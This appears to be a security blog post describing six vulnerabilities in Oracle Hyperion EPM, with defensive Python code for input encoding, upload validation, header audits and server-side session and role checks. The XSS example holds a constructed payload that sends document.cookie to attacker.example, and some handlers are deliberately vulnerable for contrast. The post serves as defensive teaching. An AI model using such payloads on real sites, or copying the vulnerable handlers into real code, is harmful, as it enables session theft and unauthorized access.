This post lists the security vulnerabilities and threats present in the Hyperion EPM system that can lead to misuse of highly sensitive financial data and information.
Data and information security is an important concern for every organization, and when a system stores, processes and manages highly sensitive financial data it becomes even more critical to apply the strongest controls to protect both the system and the data.
The EPM suite delivers a comprehensive, integrated set of applications with a common web interface and reporting tools. It stores and processes the financial information of organizations in many sectors (banking, manufacturing, healthcare and the public sector, for example). Vulnerabilities and threats present in such a system can have a huge negative impact on those organizations.
I am listing a few critical security vulnerabilities which are present in the EPM system:
- Reflected Cross-Site Scripting: EPM Hyperion processes user input on the server without validating it, and the malicious input is reflected back in the subsequent HTTP response. This behaviour makes EPM vulnerable to reflected cross-site scripting: script supplied by an attacker runs in the victim's browser within the victim's session. With that session under their control, the attacker can perform unauthorized actions in the system, such as tracking the user's operations, redirecting the user to a fake site, modifying the web page, and exploiting the browser.
- Unrestricted File Upload to the Hyperion system: The Hyperion web application does not validate the type or content of files before they are stored on the server. Executable files can be uploaded to the server and later downloaded from it. This allows an attacker to upload malicious files (viruses, malware, trojans or other executables) with the intention of having other users download and run them.
- Clear Text Traffic: The Hyperion application servers and infrastructure are not configured to enforce encryption when communicating with other hosts. In a highly sensitive system, unencrypted communication is exposed to a range of passive and active network attacks that may result in interception and/or modification of the transmitted data.
- Web Server Version Disclosure: The Hyperion web servers expose sensitive information in their response headers. The Server header defined by HTTP/1.1 (and vendor-specific headers such as X-Powered-By) is commonly populated with the name and version of the software that handled the request. These headers unintentionally reveal the server type and version, which lets an attacker look up published vulnerabilities for that exact release and launch more targeted, sophisticated attacks against the system.
- Client Side Control Bypass: The Hyperion web application relies on client-side controls to prevent users from accessing certain functionality. By modifying HTML elements and JavaScript responses, users without authorization can reach the Configuration Settings and Credentials Used For Pass-Through functionality. A malicious user can then modify the configuration settings and pass-through credentials without the required permissions, which may cause integrity and non-repudiation issues.
- Improper SSO Token Expiration: When a user issues a disconnect command (clicks the Disconnect button), the Hyperion SmartView/Disclosure Management plugin does not invalidate the user's SSO token. An attacker who has obtained the token can use it to hijack the session after the user believes they have logged out, view sensitive information and perform actions on behalf of the victim user in the application.
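The reflected cross-site scripting in the first item, shown as an added Python example rather than Hyperion's own code: the vulnerable renderer reflects the `q` parameter verbatim, the hardened one entity-encodes it for an HTML text context before reflecting it. The host name, the `/workspace/search` path, the parameter name `q` and the cookie-stealing payload are all constructed for illustration.

```python
import html
from urllib.parse import parse_qs, urlsplit

# Constructed request URL (not captured traffic): the value of ?q= is reflected into the page.
ATTACK_URL = (
    "https://epm.example.internal/workspace/search"
    '?q=<script>document.location="https://attacker.example/?c="%2Bdocument.cookie</script>'
)


def query_param(url: str, name: str) -> str:
    """Return the first value of a query parameter, percent-decoded, or '' if absent."""
    return parse_qs(urlsplit(url).query).get(name, [""])[0]


def render_vulnerable(term: str) -> str:
    """Reflects the search term into the HTML response verbatim, the behaviour described above.
    Any markup inside the term becomes live markup in the victim's browser."""
    return f"<p>Results for: {term}</p>"


def render_hardened(term: str) -> str:
    """Entity-encodes the term for an HTML *text* context before reflecting it.
    An attribute value or a JavaScript string literal would need its own encoder:
    one encoder per output context is the rule, input validation alone is not enough."""
    return f"<p>Results for: {html.escape(term, quote=True)}</p>"


def reflects_executable_markup(page: str, payload_tag: str = "<script") -> bool:
    """Detection helper for a pentest or regression test: is the raw tag from the payload
    still present in the rendered page, i.e. was it reflected without encoding?"""
    return payload_tag in page.lower()
```

To verify a fix against a live instance, send the same payload and check the response body for the raw `<script` sequence; an encoded reflection appears as `&lt;script&gt;` and is inert.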
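Server-side validation for the unrestricted upload in the second item, added here as example Python and not as vendor code. It checks an extension allowlist, rejects double extensions and path traversal in the client-supplied name, enforces a size cap, and compares the file's first bytes with the magic bytes for the claimed type, so a renamed executable fails even though its extension looks harmless. The allowed types, size limit and sample uploads are assumptions made for the example; the post does not say which types the real endpoint should accept.

```python
import os
from typing import NamedTuple

# Assumed policy for the example: each allowed extension maps to the magic bytes its content must start with.
ALLOWED_TYPES: dict[str, tuple[bytes, ...]] = {
    ".pdf": (b"%PDF-",),
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".xlsx": (b"PK\x03\x04",),  # OOXML documents are ZIP containers
}
MAX_SIZE = 10 * 1024 * 1024  # bytes, assumed limit


class Upload(NamedTuple):
    filename: str      # client-supplied, untrusted
    content_type: str  # client-supplied, untrusted and therefore never consulted below
    data: bytes


def safe_basename(filename: str) -> str:
    """Discard any client-supplied directory part (../ or C:\\...) and keep only the final component."""
    return os.path.basename(filename.replace("\\", "/"))


def validate_upload(upload: Upload) -> tuple[bool, str]:
    """Return (accepted, reason_or_safe_name). Every check is done on the server from the bytes themselves."""
    name = safe_basename(upload.filename)
    if not name or name.startswith("."):
        return False, "empty or hidden filename"
    _, ext = os.path.splitext(name.lower())  # 'report.pdf.exe' -> '.exe', so double extensions fail here
    if ext not in ALLOWED_TYPES:
        return False, f"extension {ext!r} not allowed"
    if len(upload.data) > MAX_SIZE:
        return False, "file too large"
    if not any(upload.data.startswith(magic) for magic in ALLOWED_TYPES[ext]):
        return False, "content does not match extension"
    return True, name


# Constructed sample uploads covering the cases the post describes (executables, renamed or not).
SAMPLES = {
    "pdf_ok": Upload("Q3-forecast.pdf", "application/pdf", b"%PDF-1.7\n%..."),
    "exe_plain": Upload("update.exe", "application/octet-stream", b"MZ\x90\x00" + b"\x00" * 60),
    "exe_renamed": Upload("forecast.pdf", "application/pdf", b"MZ\x90\x00" + b"\x00" * 60),
    "double_ext": Upload("forecast.pdf.exe", "application/pdf", b"%PDF-1.7\n"),
    "traversal": Upload("..\\..\\htdocs\\logo.png", "image/png", b"\x89PNG\r\n\x1a\n" + b"\x00" * 16),
}


def validate_samples() -> dict[str, tuple[bool, str]]:
    """Run every sample through the validator; handy as a regression test for the policy."""
    return {label: validate_upload(upload) for label, upload in SAMPLES.items()}
```

Accepted files should then be stored under a server-generated name outside the web root and served back with `Content-Disposition: attachment` and `X-Content-Type-Options: nosniff`, so the browser never executes them in the application's origin. Magic-byte checks catch renamed binaries but not polyglots or documents carrying macros, so an anti-malware scan of the stored file is still worthwhile where the threat is the viruses and trojans the post mentions.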
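A response-header audit covering the clear text traffic and web server version disclosure items (plus the cookie flags that limit the damage of the XSS item), added here as example Python and not a vendor tool. It parses a raw HTTP/1.1 response, flags product/version strings in `Server` and similar headers, and flags clear-text URLs, missing `Strict-Transport-Security` on HTTPS, and session cookies without `Secure`/`HttpOnly`. Both responses below are constructed; the header values are typical examples, not captures from a real deployment.

```python
import re

# Constructed responses, not captures from a real Hyperion deployment.
WEAK_URL = "http://epm.example.internal/workspace/index.jsp"
WEAK_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Apache/2.4.6 (Unix)\r\n"
    "X-Powered-By: Servlet/3.0 JSP/2.2\r\n"
    "Set-Cookie: JSESSIONID=8d3f...; Path=/workspace\r\n"
    "Content-Type: text/html;charset=UTF-8\r\n"
    "\r\n"
    "<html>...</html>"
)
HARDENED_URL = "https://epm.example.internal/workspace/index.jsp"
HARDENED_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Strict-Transport-Security: max-age=31536000; includeSubDomains\r\n"
    "Set-Cookie: JSESSIONID=8d3f...; Path=/workspace; Secure; HttpOnly\r\n"
    "Content-Type: text/html;charset=UTF-8\r\n"
    "\r\n"
    "<html>...</html>"
)

DISCLOSING_HEADERS = ("server", "x-powered-by", "x-aspnet-version")
VERSION_PATTERN = re.compile(r"\d+(?:\.\d+)+")  # e.g. 2.4.6 or 3.0


def parse_response(raw: str) -> tuple[str, dict[str, list[str]]]:
    """Split a raw HTTP/1.1 response into its status line and a case-insensitive header map.
    Repeated headers (several Set-Cookie lines, say) are kept as a list."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    headers: dict[str, list[str]] = {}
    for line in lines[1:]:
        if ":" not in line:
            continue
        name, value = line.split(":", 1)
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    return lines[0], headers


def audit_response(url: str, raw: str) -> list[str]:
    """Return findings for version disclosure and clear-text transport, or [] if nothing was found."""
    findings: list[str] = []
    _, headers = parse_response(raw)
    for name in DISCLOSING_HEADERS:
        for value in headers.get(name, []):
            kind = "version" if VERSION_PATTERN.search(value) else "product name"
            findings.append(f"{kind} disclosed in {name}: {value}")
    if url.lower().startswith("http://"):
        findings.append("served over clear-text HTTP")
    elif "strict-transport-security" not in headers:
        findings.append("HTTPS without Strict-Transport-Security header")
    for cookie in headers.get("set-cookie", []):
        cookie_name = cookie.split("=", 1)[0]
        attrs = {attr.strip().lower() for attr in cookie.split(";")[1:]}
        if "secure" not in attrs:
            findings.append(f"cookie {cookie_name} lacks the Secure flag")
        if "httponly" not in attrs:
            findings.append(f"cookie {cookie_name} lacks the HttpOnly flag")
    return findings
```

In practice the raw response comes from something like `curl -s -D - -o /dev/null URL`, which prints the headers as received. The disclosure finding is fixed in the web server's own configuration (for an Apache-based front end, `ServerTokens Prod` and `ServerSignature Off`), not in the application; the transport findings need an HTTPS-only listener with an HTTP-to-HTTPS redirect plus the HSTS header.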
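The last two items share one root cause: authority is left with the client instead of the server. The added Python below (example code, not Hyperion's) keeps SSO tokens in a server-side store so that Disconnect revokes the token immediately and idle sessions expire, and it contrasts a handler that only authenticates (so hiding the admin links in the UI is the only thing stopping a user from reaching Configuration Settings and pass-through credentials) with one that also checks the required role on the server and ignores any client-supplied flag. The action names, role names and idle timeout are assumptions for the example.

```python
import secrets
import time
from typing import Optional

SESSION_IDLE_TIMEOUT = 15 * 60  # seconds; an assumed policy value, not one from the post

# Assumed mapping of actions to the role each requires (names are illustrative).
ACTION_ROLES = {
    "view_reports": "user",
    "edit_configuration_settings": "administrator",
    "edit_pass_through_credentials": "administrator",
}


class SessionStore:
    """Server-side registry of SSO tokens. The token is an opaque random handle; user, roles and
    expiry live here, so the client can neither forge them nor keep a token alive after Disconnect."""

    def __init__(self, clock=time.time):
        self._clock = clock  # injectable so expiry can be tested without sleeping
        self._sessions: dict[str, dict] = {}

    def login(self, user: str, roles: frozenset) -> str:
        token = secrets.token_urlsafe(32)
        self._sessions[token] = {"user": user, "roles": roles, "last_seen": self._clock()}
        return token

    def disconnect(self, token: str) -> None:
        """Revoke the token at once. This is the step the post says Disconnect is missing."""
        self._sessions.pop(token, None)

    def lookup(self, token: str) -> Optional[dict]:
        """Resolve a token, enforcing the idle timeout and sliding it forward on use."""
        sess = self._sessions.get(token)
        if sess is None:
            return None
        if self._clock() - sess["last_seen"] > SESSION_IDLE_TIMEOUT:
            del self._sessions[token]
            return None
        sess["last_seen"] = self._clock()
        return sess


def handle_vulnerable(store: SessionStore, token: str, action: str) -> tuple:
    """Authentication only. The admin controls are merely hidden in the UI, so any logged-in user
    who re-enables the hidden element or calls the URL directly reaches the privileged action."""
    sess = store.lookup(token)
    if sess is None:
        return 401, "not authenticated"
    if action not in ACTION_ROLES:
        return 404, "unknown action"
    return 200, f"{sess['user']} performed {action}"


def handle_hardened(store: SessionStore, token: str, action: str, form: dict) -> tuple:
    """Authentication plus server-side authorization. `form` stands for the client-supplied fields
    (hidden inputs, JavaScript-set flags) and is deliberately ignored when deciding who may do what."""
    sess = store.lookup(token)
    if sess is None:
        return 401, "not authenticated"
    required_role = ACTION_ROLES.get(action)
    if required_role is None:
        return 404, "unknown action"
    if required_role not in sess["roles"]:
        return 403, f"{sess['user']} lacks role {required_role!r}"
    return 200, f"{sess['user']} performed {action}"
```

Hiding a menu entry or disabling a button remains fine as usability, but every privileged request must still pass the server-side role check, and a token handed out by SSO must be revocable by the application that accepted it, otherwise a captured token outlives the user's Disconnect.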
A few of these vulnerabilities can be remediated by applying the fix provided by the vendor, so it is highly recommended to raise them with the vendor to seek remediation.